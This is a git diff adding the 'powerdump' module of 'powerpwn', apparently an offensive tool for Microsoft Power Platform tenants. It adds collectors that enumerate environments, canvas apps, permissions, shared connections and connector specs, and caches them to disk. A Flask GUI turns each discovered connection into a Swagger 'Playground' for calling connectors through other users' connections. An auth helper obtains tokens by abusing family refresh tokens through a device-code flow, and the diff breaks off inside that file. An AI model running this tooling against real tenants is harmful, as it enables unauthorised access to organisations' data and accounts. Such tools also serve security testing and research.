a/src/powerpwn/powerdump/collect/models/data_store_entity.py b/src/powerpwn/powerdump/collect/models/data_store_entity.py new file mode 100644 index 0000000..abaac97 --- /dev/null +++ b/src/powerpwn/powerdump/collect/models/data_store_entity.py @@ -0,0 +1,26 @@ +from typing import Any, Dict, Optional + +from pydantic import Field, HttpUrl, validator + +from powerpwn.powerdump.collect.models.base_entity import BaseEntity +from powerpwn.powerdump.collect.models.data_store_validator import DataStoreValidator + + +class DataStore(BaseEntity): + account: str = Field(..., title="Account ID") + tenant: Optional[str] = Field(..., title="Tenant ID") # order matters, tenant relies on account + + scope: Optional[str] = Field(..., title="Access scope") + + host: HttpUrl = Field(..., title="Host") + name: Optional[str] = Field(..., title="Display name") + + extra: Dict = Field(..., title="Additional information") + + validate_tenant: Any = validator("tenant", allow_reuse=True)(DataStoreValidator.validate_tenant) + + +class DataStoreWithContext(BaseEntity): + api_name: str = Field(..., title="API Name", description="Example: shared_gmail") + connection_id: str = Field(..., title="Connection ID") + data_store: DataStore = Field(..., title="Data Store") diff --git a/src/powerpwn/powerdump/collect/models/data_store_validator.py b/src/powerpwn/powerdump/collect/models/data_store_validator.py new file mode 100644 index 0000000..d62582b --- /dev/null +++ b/src/powerpwn/powerdump/collect/models/data_store_validator.py @@ -0,0 +1,14 @@ +from typing import Any, Dict, Optional + + +class DataStoreValidator: + # noinspection PyUnusedLocal + @classmethod + def validate_tenant(cls, tenant: Optional[str], values: Dict[str, Any]) -> Optional[str]: + if tenant in (None, ""): + if (account := values.get("account")) is not None: + if account.count("@") == 1: + # populate tenant with email domain + tenant = account.split("@")[-1] + + return tenant diff --git a/src/powerpwn/powerdump/collect/models/principal_entity.py b/src/powerpwn/powerdump/collect/models/principal_entity.py new file mode 100644 index 0000000..3cc30e0 --- /dev/null +++ b/src/powerpwn/powerdump/collect/models/principal_entity.py @@ 
-0,0 +1,13 @@ +from typing import Optional + +from pydantic import EmailStr, Field + +from powerpwn.powerdump.collect.models.resource_entity_base import ResourceEntityBase + + +class Principal(ResourceEntityBase): + principal_id: str = Field(..., title="Connection ID") + type: str = Field(..., title="Principal type") + tenant_id: str = Field(..., title="AAD tenant ID") + email: Optional[EmailStr] = Field(None, title="Email address") + upn: Optional[EmailStr] = Field(None, title="User principal name") diff --git a/src/powerpwn/powerdump/collect/models/resource_entity_base.py b/src/powerpwn/powerdump/collect/models/resource_entity_base.py new file mode 100644 index 0000000..be38634 --- /dev/null +++ b/src/powerpwn/powerdump/collect/models/resource_entity_base.py @@ -0,0 +1,11 @@ +from typing import Any, Dict, Optional + +from powerpwn.powerdump.collect.models.base_entity import BaseEntity +from powerpwn.powerdump.collect.resources_collectors.enums.resource_type import ResourceType + + +class ResourceEntityBase(BaseEntity): + entity_type: ResourceType + display_name: Optional[str] = None + entity_id: str + raw_json: Dict[str, Any] diff --git a/src/powerpwn/powerdump/collect/resources_collectors/__init__.py b/src/powerpwn/powerdump/collect/resources_collectors/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/src/powerpwn/powerdump/collect/resources_collectors/_api.py b/src/powerpwn/powerdump/collect/resources_collectors/_api.py new file mode 100644 index 0000000..19e37ca --- /dev/null +++ b/src/powerpwn/powerdump/collect/resources_collectors/_api.py @@ -0,0 +1,82 @@ +from typing import Any, Dict, Generator, List, Optional + +import requests + + +def list_connectors(session: requests.Session, environment_id: str) -> Generator[Dict[str, Any], None, None]: + yield from __paginate( + session, + "https://api.powerapps.com/providers/Microsoft.PowerApps/apis", + {"api-version": "2016-11-01", "$filter": f"environment eq '{environment_id}'"}, + f"get_connectors(environment_id={environment_id})", + ) + + +def get_connector(session: requests.Session, environment_id: str, connector_id: str): + resp = session.get( + url=f"https://api.powerapps.com/providers/Microsoft.PowerApps/apis/{connector_id}", + params={"api-version": "2016-11-01", "$filter": f"environment eq '{environment_id}'"}, + ) + if resp.status_code != 200: + raise RuntimeError( + f"Got status code {resp.status_code} for get_connector(environment_id={environment_id}, connector_name={connector_id}): {str(resp.content)}." 
+ ) + return resp.json() + + +def list_connections(session: requests.Session, environment_id: str) -> Generator[Dict[str, Any], None, None]: + yield from __paginate( + session, + "https://api.powerapps.com/providers/Microsoft.PowerApps/connections", + {"api-version": "2016-11-01", "$filter": f"environment eq '{environment_id}'"}, + f"list_connections(environment_id={environment_id})", + ) + + +def list_canvas_apps(session: requests.Session, environment_id: str) -> Generator[Dict[str, Any], None, None]: + yield from __paginate( + session, + "https://api.powerapps.com/providers/Microsoft.PowerApps/apps", + {"api-version": "2016-11-01", "$filter": f"environment eq '{environment_id}'"}, + f"list_canvas_apps(environment_id={environment_id})", + ) + + +def list_canvas_app_rbac(session: requests.Session, app_id: str, environment_id: str) -> Generator[Dict[str, Any], None, None]: + yield from __paginate( + session, + f"https://api.powerapps.com/providers/Microsoft.PowerApps/apps/{app_id}/permissions", + {"api-version": "2016-11-01", "$filter": f"environment eq '{environment_id}'"}, + f"list_canvas_app_rbac(environment_id={environment_id})", + ) + + +def list_environments(session: requests.Session) -> List[str]: + resp = session.get(url="https://api.powerapps.com/providers/Microsoft.PowerApps/environments", params={"api-version": "2016-11-01"}) + if resp.status_code != 200: + raise RuntimeError(f"Got status code {resp.status_code} for list_environments: {str(resp.content)}.") + + environment_ids = [environment_obj["name"] for environment_obj in resp.json()["value"]] + return environment_ids + + +def __paginate( + session: requests.Session, url: str, params: Dict[str, str], endpoint: str, next_link: Optional[str] = None +) -> Generator[Dict[str, Any], None, None]: + params_to_query = params + url_to_query = url + + if next_link: + params_to_query = {} + url_to_query = next_link + + resp = session.get(url=url_to_query, params=params_to_query) + if resp.status_code != 200: + raise RuntimeError(f"Got status code {resp.status_code} for {endpoint}: {str(resp.content)}.") + + res = resp.json() + + yield from res["value"] + + if "nextLink" in res: + yield from __paginate(session, url, params, endpoint, res["nextLink"]) diff --git a/src/powerpwn/powerdump/collect/resources_collectors/canvas_apps_collector.py b/src/powerpwn/powerdump/collect/resources_collectors/canvas_apps_collector.py new file mode 100644 index 0000000..af8e3b2 --- /dev/null +++ b/src/powerpwn/powerdump/collect/resources_collectors/canvas_apps_collector.py @@ -0,0 +1,88 @@ +import logging +from typing import Generator + +import requests + +from powerpwn.const import LOGGER_NAME +from powerpwn.powerdump.collect.models.canvas_app_entity import CanvasApp +from powerpwn.powerdump.collect.models.principal_entity import Principal +from powerpwn.powerdump.collect.resources_collectors._api import list_canvas_app_rbac, list_canvas_apps +from powerpwn.powerdump.collect.resources_collectors.enums.resource_type import ResourceType +from powerpwn.powerdump.collect.resources_collectors.iresource_collector import IResourceCollector + +logger = logging.getLogger(LOGGER_NAME) + + +class CanvasAppsCollector(IResourceCollector): + def collect(self, session: requests.Session, environment_id: str) -> Generator[CanvasApp, None, None]: + total_canvas_apps = 0 + total_widely_shared_canvas_apps = 0 + for canvas_app in list_canvas_apps(session, environment_id): + total_canvas_apps += 1 + rbacs = list(list_canvas_app_rbac(session, canvas_app["name"], 
environment_id)) + if any(rbac.get("properties", {}).get("principal", {}).get("type", "NOT_TENANT") == "Tenant" for rbac in rbacs): + total_widely_shared_canvas_apps += 1 + principals = [] + for rbac in rbacs: + if rbac["properties"]["principal"]["type"] == "Tenant": + principals.append( + Principal( + entity_type=ResourceType.principal, + entity_id=rbac["properties"]["principal"].get("tenantId"), + principal_id=rbac["properties"]["principal"].get("tenantId"), + type=rbac["properties"]["principal"].get("type"), + tenant_id=rbac["properties"]["principal"].get("tenantId"), + raw_json=rbac, + display_name=rbac["properties"]["principal"].get("tenantId"), + ) + ) + else: + principals.append( + Principal( + entity_type=ResourceType.principal, + entity_id=rbac["properties"]["principal"].get("id"), + principal_id=rbac["properties"]["principal"].get("id"), + type=rbac["properties"]["principal"].get("type"), + tenant_id=rbac["properties"]["principal"].get("tenantId", "N/A"), + display_name=rbac["properties"]["principal"].get("displayName"), + email=rbac["properties"]["principal"].get("email"), + upn=rbac["properties"]["principal"].get("email"), + raw_json=rbac, + ) + ) + + created_by = Principal( + entity_type=ResourceType.principal, + entity_id=canvas_app["properties"]["createdBy"].get("id"), + principal_id=canvas_app["properties"]["createdBy"].get("id"), + type=canvas_app["properties"]["createdBy"].get("type"), + tenant_id=canvas_app["properties"]["createdBy"].get("tenantId", "N/A"), + display_name=canvas_app["properties"]["createdBy"].get("displayName"), + email=canvas_app["properties"]["createdBy"].get("email"), + upn=canvas_app["properties"]["createdBy"].get("userPrincipalName"), + raw_json=canvas_app["properties"]["createdBy"], + ) + + run_url = canvas_app["properties"]["appPlayUri"] + version = canvas_app["properties"]["appVersion"] + environment_id = canvas_app["properties"]["environment"]["name"].replace("default", "Default") + + yield CanvasApp( + raw_json=canvas_app, + display_name=canvas_app["properties"]["displayName"], + created_by=created_by, + created_at=canvas_app["properties"]["createdTime"], + last_modified_at=canvas_app["properties"]["lastModifiedTime"], + run_url=run_url, + version=version, + permissions=principals, + entity_id=canvas_app["name"], + environment_id=environment_id, + entity_type=ResourceType.canvas_app, + ) + logger.info( + f"Found {total_widely_shared_canvas_apps} widely shared canvas apps out of {total_canvas_apps} canvas apps in environment {environment_id}" + ) + + def resource_type(self) -> ResourceType: + return ResourceType.canvas_app diff --git a/src/powerpwn/powerdump/collect/resources_collectors/connections_collector.py b/src/powerpwn/powerdump/collect/resources_collectors/connections_collector.py new file mode 100644 index 0000000..0b685b8 --- /dev/null +++ b/src/powerpwn/powerdump/collect/resources_collectors/connections_collector.py @@ -0,0 +1,85 @@ +import logging +from typing import Dict, Generator, List + +import requests + +from powerpwn.const import LOGGER_NAME +from powerpwn.powerdump.collect.models.connection_entity import Connection +from powerpwn.powerdump.collect.models.principal_entity import Principal +from powerpwn.powerdump.collect.resources_collectors._api import list_connections +from powerpwn.powerdump.collect.resources_collectors.enums.resource_type import ResourceType +from powerpwn.powerdump.collect.resources_collectors.iresource_collector import IResourceCollector + +logger = logging.getLogger(LOGGER_NAME) + + +class 
ConnectionsCollector(IResourceCollector): + def __init__(self, connector_id_to_connection_ids: Dict[str, List[str]]) -> None: + self.__connector_id_to_connection_ids = connector_id_to_connection_ids + + def collect(self, session: requests.Session, environment_id: str) -> Generator[Connection, None, None]: + total_connections_count = 0 + active_shareable_connections_count = 0 + raw_connections = list_connections(session, environment_id=environment_id) + + for raw_connection in raw_connections: + total_connections_count += 1 + if raw_connection["properties"]["apiId"] != "/providers/Microsoft.PowerApps/apis/shared_logicflows" and ( + raw_connection["properties"]["statuses"][0]["status"] != "Connected" + ): + # ignore non-active or non shareable connections, other than Logic Flows + continue + + active_shareable_connections_count += 1 + principal = Principal( + entity_type=ResourceType.principal, + entity_id=raw_connection["properties"]["createdBy"].get("id"), + principal_id=raw_connection["properties"]["createdBy"].get("id"), + type=raw_connection["properties"]["createdBy"].get("type"), + tenant_id=raw_connection["properties"]["createdBy"].get("tenantId", "N/A"), + display_name=raw_connection["properties"]["createdBy"].get("displayName"), + email=raw_connection["properties"]["createdBy"].get("email"), + upn=raw_connection["properties"]["createdBy"].get("userPrincipalName"), + raw_json=raw_connection["properties"]["createdBy"], + ) + + connection_props = { + "accountName": raw_connection["properties"].get("accountName"), + **raw_connection["properties"].get("connectionParameters", {}), + **raw_connection["properties"].get("connectionParametersSet", {}), + } + + connection = Connection( + entity_type=ResourceType.connection, + entity_id=raw_connection["name"], + connection_id=raw_connection["name"], + display_name=raw_connection["properties"]["displayName"], + is_valid=all([status_obj["status"] == "Connected" for status_obj in raw_connection["properties"]["statuses"]]), + connector_id=raw_connection["properties"]["apiId"].replace("/providers/Microsoft.PowerApps/apis/", ""), + api_id=raw_connection["properties"]["apiId"], + icon_uri=raw_connection["properties"]["iconUri"], + environment_id=raw_connection["properties"]["environment"]["id"] + .replace("/providers/Microsoft.PowerApps/environments/", "") + .replace("default", "Default"), + environment_name=raw_connection["properties"]["environment"]["name"], + created_at=raw_connection["properties"]["createdTime"], + last_modified_at=raw_connection["properties"]["lastModifiedTime"], + expiration_time=raw_connection["properties"].get("expirationTime"), + created_by=principal, + connection_parameters=connection_props, + test_uri=raw_connection["properties"].get("testLinks", [{}])[0].get("requestUri"), + shareable=raw_connection["properties"]["allowSharing"], + raw_json=raw_connection, + ) + + self.__connector_id_to_connection_ids[connection.connector_id] = self.__connector_id_to_connection_ids.get( + connection.connector_id, [] + ) + [connection.connection_id] + + yield connection + logger.info( + f"Found {active_shareable_connections_count} active shareable connections out of {total_connections_count} connections in environment {environment_id}" + ) + + def resource_type(self) -> ResourceType: + return ResourceType.connection diff --git a/src/powerpwn/powerdump/collect/resources_collectors/connectors_collector.py b/src/powerpwn/powerdump/collect/resources_collectors/connectors_collector.py new file mode 100644 index 0000000..7b38a00 --- /dev/null +++ 
b/src/powerpwn/powerdump/collect/resources_collectors/connectors_collector.py @@ -0,0 +1,62 @@ +import logging +from typing import Dict, Generator, List + +import requests + +from powerpwn.const import LOGGER_NAME +from powerpwn.powerdump.collect.models.connector_entity import Connector +from powerpwn.powerdump.collect.resources_collectors._api import get_connector +from powerpwn.powerdump.collect.resources_collectors.enums.resource_type import ResourceType +from powerpwn.powerdump.collect.resources_collectors.iresource_collector import IResourceCollector +from powerpwn.powerdump.utils.const import SPEC_JWT_NAME + +logger = logging.getLogger(LOGGER_NAME) + + +class ConnectorsCollector(IResourceCollector): + def __init__(self, connector_id_to_connection_ids: Dict[str, List[str]]) -> None: + self.__connector_id_to_connection_ids = connector_id_to_connection_ids + + def collect(self, session: requests.Session, environment_id: str) -> Generator[Connector, None, None]: + for connector_id in self.__connector_id_to_connection_ids: + logger.info(f"Fetching OpenAPI spec for connector {connector_id}.") + + try: + connector = get_connector(session, environment_id=environment_id, connector_id=connector_id) + except RuntimeError as e: + if "403" in str(e): + logger.warning(f"User doesn't have access to custom connector spec for connector_id={connector_id}. Skipping spec.") + continue + raise e + + swagger = connector["properties"]["swagger"] + + swagger["securityDefinitions"] = swagger.get("securityDefinitions", {}) + swagger["securityDefinitions"][SPEC_JWT_NAME] = { + "name": "Authorization", + "in": "header", + "type": "apiKey", + "description": "JWT Authorization header", + } + + swagger["security"] = swagger.get("security", []) + swagger["security"].append({"ApiHubBearerAuth": []}) + + spec = Connector( + api_name=connector_id, + display_name=connector_id, + environment_id=environment_id, + created_at=connector["properties"]["createdTime"], + last_modified_at=connector["properties"]["changedTime"], + created_by=connector["properties"]["publisher"], + version=connector["properties"]["swagger"]["info"]["version"], + swagger=swagger, + entity_id=connector_id, + entity_type=ResourceType.connector, + raw_json=connector, + ) + + yield spec + + def resource_type(self) -> ResourceType: + return ResourceType.connector diff --git a/src/powerpwn/powerdump/collect/resources_collectors/enums/__init__.py b/src/powerpwn/powerdump/collect/resources_collectors/enums/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/src/powerpwn/powerdump/collect/resources_collectors/enums/resource_type.py b/src/powerpwn/powerdump/collect/resources_collectors/enums/resource_type.py new file mode 100644 index 0000000..d32d00e --- /dev/null +++ b/src/powerpwn/powerdump/collect/resources_collectors/enums/resource_type.py @@ -0,0 +1,10 @@ +from enum import auto + +from powerpwn.enums.str_enum import StrEnum + + +class ResourceType(StrEnum): + connection = auto() + connector = auto() + canvas_app = auto() + principal = auto() diff --git a/src/powerpwn/powerdump/collect/resources_collectors/iresource_collector.py b/src/powerpwn/powerdump/collect/resources_collectors/iresource_collector.py new file mode 100644 index 0000000..47833dd --- /dev/null +++ b/src/powerpwn/powerdump/collect/resources_collectors/iresource_collector.py @@ -0,0 +1,25 @@ +from abc import ABC, abstractmethod +from typing import Generator + +import requests + +from powerpwn.powerdump.collect.models.resource_entity_base import ResourceEntityBase +from 
powerpwn.powerdump.collect.resources_collectors.enums.resource_type import ResourceType + + +class IResourceCollector(ABC): + @abstractmethod + def collect(self, session: requests.Session, env_id: str) -> Generator[ResourceEntityBase, None, None]: + """ + Collect resources + + Args: + session (requests.Session): authenticated session + env_id (str): environment id + + """ + ... + + @abstractmethod + def resource_type(self) -> ResourceType: + ... diff --git a/src/powerpwn/powerdump/collect/resources_collectors/resources_collector.py b/src/powerpwn/powerdump/collect/resources_collectors/resources_collector.py new file mode 100644 index 0000000..c8bd490 --- /dev/null +++ b/src/powerpwn/powerdump/collect/resources_collectors/resources_collector.py @@ -0,0 +1,54 @@ +import logging +import os.path +from typing import Dict, Generator, List + +from powerpwn.const import LOGGER_NAME +from powerpwn.powerdump.collect.models.resource_entity_base import ResourceEntityBase +from powerpwn.powerdump.collect.resources_collectors._api import list_environments +from powerpwn.powerdump.collect.resources_collectors.canvas_apps_collector import CanvasAppsCollector +from powerpwn.powerdump.collect.resources_collectors.connections_collector import ConnectionsCollector +from powerpwn.powerdump.collect.resources_collectors.connectors_collector import ConnectorsCollector +from powerpwn.powerdump.collect.resources_collectors.enums.resource_type import ResourceType +from powerpwn.powerdump.utils.const import DATA_MODEL_FILE_EXTENSION +from powerpwn.powerdump.utils.path_utils import env_entity_type_path +from powerpwn.powerdump.utils.requests_wrapper import init_session + +logger = logging.getLogger(LOGGER_NAME) + + +class ResourcesCollector: + """ + A Class to collect resources and cache them in provided cache path + """ + + def __init__(self, cache_path: str, token: str) -> None: + self.__cache_path = cache_path + self.__session = init_session(token=token) + self.__collectors = [CanvasAppsCollector, ConnectionsCollector, ConnectorsCollector] + + def collect_and_cache(self) -> None: + """ + Collect resources and store them in cache + + Args: + cache_path (str): cache path to store resources + """ + environment_ids = list_environments(self.__session) + logger.info(f"Found {len(environment_ids)} environments.") + + for env_id in environment_ids: + connector_id_to_connection_ids: Dict[str, List[str]] = dict() + for collector in self.__collectors: + if collector in (ConnectionsCollector, ConnectorsCollector): + collector_instance = collector(connector_id_to_connection_ids) + else: + collector_instance = collector() + self._cache_entities(collector_instance.collect(self.__session, env_id), collector_instance.resource_type(), env_id) + + def _cache_entities(self, entities: Generator[ResourceEntityBase, None, None], entity_type: ResourceType, env_id: str) -> None: + dir_name = env_entity_type_path(env_id, entity_type, self.__cache_path) + os.makedirs(dir_name, exist_ok=True) + for entity in entities: + file_path = os.path.join(dir_name, entity.entity_id + DATA_MODEL_FILE_EXTENSION) + with open(file_path, "w") as fp: + fp.write(entity.json()) diff --git a/src/powerpwn/powerdump/gui/__init__.py b/src/powerpwn/powerdump/gui/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/src/powerpwn/powerdump/gui/assets/logo.png b/src/powerpwn/powerdump/gui/assets/logo.png new file mode 100644 index 0000000..0e6bbe0 Binary files /dev/null and b/src/powerpwn/powerdump/gui/assets/logo.png differ diff --git 
a/src/powerpwn/powerdump/gui/gui.py b/src/powerpwn/powerdump/gui/gui.py new file mode 100644 index 0000000..176eeaf --- /dev/null +++ b/src/powerpwn/powerdump/gui/gui.py @@ -0,0 +1,45 @@ +import logging +import os +import pathlib +import subprocess # nosec + +from flask import Flask + +from powerpwn.const import LOGGER_NAME +from powerpwn.powerdump.gui.prep import ( + flt_connection_table_wrapper, + flt_resource_wrapper, + full_canvasapps_table_wrapper, + full_connection_table_wrapper, + full_connectors_table_wrapper, + full_resources_table_wrapper, + register_specs, +) + + +class Gui: + def run(self, cache_path: str): + # run file browser + subprocess.Popen(["browsepy", "0.0.0.0", "8080", "--directory", cache_path], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) # nosec + + # run resources flask app + app = Flask(__name__, template_folder=self.__get_template_full_path()) + register_specs(app=app, cache_path=cache_path) + app.route("/")(full_resources_table_wrapper(cache_path=cache_path)) + app.route("/connection")(full_connection_table_wrapper(cache_path=cache_path)) + app.route("/canvas_app/")(full_canvasapps_table_wrapper(cache_path)) + app.route("/connector/")(full_connectors_table_wrapper(cache_path)) + app.route("//")(flt_connection_table_wrapper(cache_path=cache_path)) + app.route("///")(flt_resource_wrapper(cache_path=cache_path)) + + logger = logging.getLogger(LOGGER_NAME) + logger.info("Application is running on http://127.0.0.1:5000") + + # turn off server logs + log = logging.getLogger("werkzeug") + log.setLevel(logging.ERROR) + + app.run() + + def __get_template_full_path(self) -> str: + return os.path.join(pathlib.Path(__file__).parent.resolve(), "templates") diff --git a/src/powerpwn/powerdump/gui/prep.py b/src/powerpwn/powerdump/gui/prep.py new file mode 100644 index 0000000..882a399 --- /dev/null +++ b/src/powerpwn/powerdump/gui/prep.py @@ -0,0 +1,111 @@ +import json +import os +import pathlib +from typing import Optional + +from flask import Flask, render_template +from swagger_ui import flask_api_doc + +from powerpwn.const import TOOL_NAME +from powerpwn.powerdump.collect.models.resource_entity_base import ResourceEntityBase +from powerpwn.powerdump.collect.resources_collectors.enums.resource_type import ResourceType +from powerpwn.powerdump.utils.model_loaders import ( + get_canvasapp, + get_connection, + get_connector, + load_canvasapps, + load_connections, + load_connectors, + load_resources, + map_connector_id_and_env_id_to_connection_ids, +) + + +def register_specs(app: Flask, cache_path: str): + connections = load_connections(cache_path=cache_path) + connector_id_and_env_id_to_connection_ids = map_connector_id_and_env_id_to_connection_ids(connections=connections) + + for spec in load_connectors(cache_path=cache_path): + # clean connectionId from parameters + for _, path_obj in spec.swagger.get("paths", {}).items(): + for _, path_method_obj in path_obj.items(): + path_method_obj["parameters"] = [params for params in path_method_obj.get("parameters", []) if params.get("name") != "connectionId"] + + # generate Swagger UI for each connection + for connection_id in connector_id_and_env_id_to_connection_ids[(spec.api_name, spec.environment_id)]: + title = f"{spec.swagger['info']['title']} / {connection_id}" + base_path = spec.swagger["basePath"].replace("/apim/", "") + + flask_api_doc( + app, + config=spec.processed_swagger(connection_id=connection_id, make_concrete=False), + url_prefix=f"/api/shared_{base_path}/{connection_id}", + title=title, + ) + + +def 
full_resources_table_wrapper(cache_path: str): + def full_resources_table(): + resources = list(load_resources(cache_path=cache_path)) + + return render_template("resources_table.html", title=TOOL_NAME, resources=resources) + + return full_resources_table + + +def full_connection_table_wrapper(cache_path: str): + def full_connection_table(): + connections = list(load_connections(cache_path=cache_path)) + + return render_template("connections_table.html", title=f"{TOOL_NAME} - Connections", resources=connections) + + return full_connection_table + + +def flt_connection_table_wrapper(cache_path: str): + def flt_connection_table(connector_id: str): + connections = [conn for conn in load_connections(cache_path=cache_path) if conn.connector_id == connector_id] + + return render_template("connections_table.html", title=f"{TOOL_NAME} - {connector_id}", resources=connections) + + return flt_connection_table + + +def full_canvasapps_table_wrapper(cache_path: str): + def full_canvasapp_table(): + apps = list(load_canvasapps(cache_path=cache_path)) + + return render_template("canvasapps_table.html", title=f"{TOOL_NAME} - Canvas Apps", resources=apps) + + return full_canvasapp_table + + +def full_connectors_table_wrapper(cache_path: str): + def full_connector_table(): + connectors = list(load_connectors(cache_path=cache_path)) + + return render_template("connectors_table.html", title=f"{TOOL_NAME} - Connectors", resources=connectors) + + return full_connector_table + + +def flt_resource_wrapper(cache_path: str): + def get_resource_page(resource_type: ResourceType, env_id: str, resource_id: str): + resource: Optional[ResourceEntityBase] = None + if resource_type == ResourceType.canvas_app: + resource = get_canvasapp(cache_path, env_id, resource_id) + elif resource_type == ResourceType.connection: + resource = get_connection(cache_path, env_id, resource_id) + elif resource_type == ResourceType.connector: + resource = get_connector(cache_path, env_id, resource_id) + + if resource: + return render_template( + "json_object.html", title=f"{TOOL_NAME} - {resource_type} {resource_id}", json_object=json.dumps(resource.raw_json) + ) + + return get_resource_page + + +def __get_template_full_path(template_name: str) -> str: + return os.path.join(pathlib.Path(__file__).parent.resolve(), "templates", template_name) diff --git a/src/powerpwn/powerdump/gui/templates/__init__.py b/src/powerpwn/powerdump/gui/templates/__init__.py new file mode 100644 index 0000000..0cf945a --- /dev/null +++ b/src/powerpwn/powerdump/gui/templates/__init__.py @@ -0,0 +1,3 @@ +""" +Borrowing from https://github.com/miguelgrinberg/flask-tables +""" diff --git a/src/powerpwn/powerdump/gui/templates/base.html b/src/powerpwn/powerdump/gui/templates/base.html new file mode 100644 index 0000000..f8d8cbc --- /dev/null +++ b/src/powerpwn/powerdump/gui/templates/base.html @@ -0,0 +1,31 @@ + + + + {{ title }} + + + + +
+

{{ title }}

+
+
+ +
+ {% block content %}{% endblock %} +
+
+
+ + + + {% block scripts %}{% endblock %} + + \ No newline at end of file diff --git a/src/powerpwn/powerdump/gui/templates/canvasapps_table.html b/src/powerpwn/powerdump/gui/templates/canvasapps_table.html new file mode 100644 index 0000000..b073fea --- /dev/null +++ b/src/powerpwn/powerdump/gui/templates/canvasapps_table.html @@ -0,0 +1,40 @@ +{% extends "base.html" %} + +{% block content %} + + + + + + + + + + + + + {% for canvasapp in resources %} + + + + + + + + + + + {% endfor %} + +
Display nameEnvironment VersionCreated byCreated at Last modified at
{{ canvasapp.display_name }}{{ canvasapp.environment_id }}{{ canvasapp.version }}{{ canvasapp.created_by.email }}{{ canvasapp.created_at }}{{ canvasapp.last_modified_at }}Run Raw
+{% endblock %} + +{% block scripts %} + +{% endblock %} \ No newline at end of file diff --git a/src/powerpwn/powerdump/gui/templates/connections_table.html b/src/powerpwn/powerdump/gui/templates/connections_table.html new file mode 100644 index 0000000..5612d37 --- /dev/null +++ b/src/powerpwn/powerdump/gui/templates/connections_table.html @@ -0,0 +1,47 @@ +{% extends "base.html" %} + +{% block content %} + + + + + + + + + + + + + + + + {% for connection in resources %} + + + + + + + + + + + + + + + {% endfor %} + +
ConnectorConnectionEnvironment Is validLast modified atExpires atCreated byShareable
{{ connection.connection_id }}{{ connection.connector_id }}{{ connection.display_name }}{{ connection.environment_id }}{{ connection.is_valid }}{{ connection.last_modified_at }}{{ connection.expiration_time }}{{ connection.created_by.email }}{{ connection.shareable }}PlaygroundRaw Dump
+{% endblock %} + +{% block scripts %} + +{% endblock %} \ No newline at end of file diff --git a/src/powerpwn/powerdump/gui/templates/connectors_table.html b/src/powerpwn/powerdump/gui/templates/connectors_table.html new file mode 100644 index 0000000..32c1655 --- /dev/null +++ b/src/powerpwn/powerdump/gui/templates/connectors_table.html @@ -0,0 +1,37 @@ +{% extends "base.html" %} + +{% block content %} + + + + + + + + + + + + {% for connector in resources %} + + + + + + + + + {% endfor %} + +
Display nameVersionCreated byCreated at Last modified at
{{ connector.display_name }}{{ connector.version }}{{ connector.created_by }}{{ connector.created_at }}{{ connector.last_modified_at }}Raw
+{% endblock %} + +{% block scripts %} + +{% endblock %} \ No newline at end of file diff --git a/src/powerpwn/powerdump/gui/templates/json_object.html b/src/powerpwn/powerdump/gui/templates/json_object.html new file mode 100644 index 0000000..0d7f552 --- /dev/null +++ b/src/powerpwn/powerdump/gui/templates/json_object.html @@ -0,0 +1,13 @@ +{% extends "base.html" %} + +{% block content %} + +

+{% endblock %}
+
+{% block scripts %}
+
+{% endblock %}
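The table templates above are thin views over the cached resources; `Gui.run` wires them into a Flask app on port 5000, registers a Swagger UI per connection via `register_specs`, and serves the raw cache directory with `browsepy` on port 8080. A minimal sketch of driving the GUI directly, assuming a cache directory already populated by a previous dump:

```
from powerpwn.powerdump.gui.gui import Gui

# Serves the resources app on http://127.0.0.1:5000 and the
# browsepy file browser on port 8080, reading from .cache.
Gui().run(cache_path=".cache")
```
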
diff --git a/src/powerpwn/powerdump/gui/templates/resources_table.html b/src/powerpwn/powerdump/gui/templates/resources_table.html
new file mode 100644
index 0000000..b6f6749
--- /dev/null
+++ b/src/powerpwn/powerdump/gui/templates/resources_table.html
@@ -0,0 +1,41 @@
+{% extends "base.html" %}
+
+{% block content %}
+  <table>
+    <thead>
+      <tr>
+        <th>Resource Name</th>
+        <th>Resource Id</th>
+        <th>Resource Type</th>
+        <th>Environment</th>
+        <th>Created By</th>
+        <th>Created At</th>
+        <th>Last modified At</th>
+      </tr>
+    </thead>
+    <tbody>
+      {% for resource in resources %}
+        <tr>
+          <td>{{ resource.display_name }}</td>
+          <td>{{ resource.entity_id }}</td>
+          <td>{{ resource.entity_type }}</td>
+          <td>{{ resource.environment_id }}</td>
+          <td>{{ resource.created_by.email }}</td>
+          <td>{{ resource.created_at }}</td>
+          <td>{{ resource.last_modified_at }}</td>
+          <td><a href="/{{ resource.entity_type }}/{{ resource.environment_id }}/{{ resource.entity_id }}">Raw</a></td>
+        </tr>
+      {% endfor %}
+    </tbody>
+  </table>
+{% endblock %} + +{% block scripts %} + +{% endblock %} \ No newline at end of file diff --git a/src/powerpwn/powerdump/utils/__init__.py b/src/powerpwn/powerdump/utils/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/src/powerpwn/powerdump/utils/auth.py b/src/powerpwn/powerdump/utils/auth.py new file mode 100644 index 0000000..156add9 --- /dev/null +++ b/src/powerpwn/powerdump/utils/auth.py @@ -0,0 +1,103 @@ +import logging +from typing import Optional + +import msal + +from powerpwn.const import LOGGER_NAME, TOOL_NAME +from powerpwn.powerdump.utils.const import API_HUB_SCOPE, AZURE_CLI_APP_ID, GRAPH_API_SCOPE, POWER_APPS_SCOPE +from powerpwn.powerdump.utils.token_cache import TOKEN_CACHE_PATH, TokenCache, put_token, put_tokens, try_fetch_token + +logger = logging.getLogger(LOGGER_NAME) + +AZURE_CLI_REFRESH_TOKEN = "cli_refresh_token" # nosec +POWERAPPS_ACCESS_TOKEN = "powerapps_access_token" # nosec +APIHUB_ACCESS_TOKEN = "apihub_access_token" # nosec + +SCOPE_TO_TOKEN_CACHE_TYPE = {API_HUB_SCOPE: APIHUB_ACCESS_TOKEN, POWER_APPS_SCOPE: POWERAPPS_ACCESS_TOKEN} + + +def acquire_token(scope: str, tenant: Optional[str] = None) -> str: + """ + Leverage family refresh tokens to acquire a Graph API refresh token and exchange it for other required scopes + https://github.com/secureworks/family-of-client-ids-research + :param scope: token scope + :return: Bearer token + """ + logger.info(f"Acquiring token with scope={scope}.") + + azure_cli_client = __get_msal_cli_application(tenant) + + # Acquire Graph API refresh token + device_flow = azure_cli_client.initiate_device_flow(scopes=[GRAPH_API_SCOPE]) + print(device_flow["message"]) + azure_cli_bearer_tokens_for_graph_api = 